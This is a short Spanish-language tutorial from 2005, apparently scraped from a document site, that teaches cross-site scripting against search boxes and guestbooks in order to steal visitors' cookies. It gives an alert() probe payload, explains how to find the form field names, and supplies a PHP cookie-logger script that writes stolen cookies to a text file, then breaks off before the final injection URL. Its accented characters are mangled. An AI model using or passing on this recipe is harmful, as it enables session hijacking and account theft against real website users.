Documente Academic
Documente Profesional
Documente Cultură
Hay dos formas para poder usar este ataque: a un buscador, o a otro tipo de form
ulario (un libro de visitas o un tag por ejemplo)
Buscador:
Lo primero encontrar un buscador, para saber si es vulnerable introducir el sigu
iente cdigo:
<script>alert(hola)</script>
Si es vulnerables, saldr un ventana que pondr hola, en caso contrario no saldr nada
.
Si vulnerable, el siguiente paso es ver el name del buscador y del botn de bsqued
a.
<input type="text" name="palabra"> que ser el formulario.
<input type="submit" name="buscar" value="Buscar"> que ser el boton.
La caja de texto donde ponemos lo que vamos a buscar se llama palabra y el botn b
uscar.
Ahora lo que hay que hacer es almacenar las cookies en un archivo d texto para e
llo creamos un archivo PHP que contenga el siguiente cdigo.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=cookies.php-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Cdigo:
##################################
# <? #
# $cookie = $_GET['cookie']; #
# $fff = fopen("cookie.txt","a");#
# fwrite($fff, "$cookie \n"); #
# fclose($fff); #
# ?> #
##################################
lo que hace este cdigo es guardar la cookie en un archivo txt que se llama cookie
.txt.
Una vez hecho este paso solo tenemos que crear URL que ejecute a cookie.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
######################################################################
Copyright 2005 YaNKee Zoft - No modificar sin permiso de su autor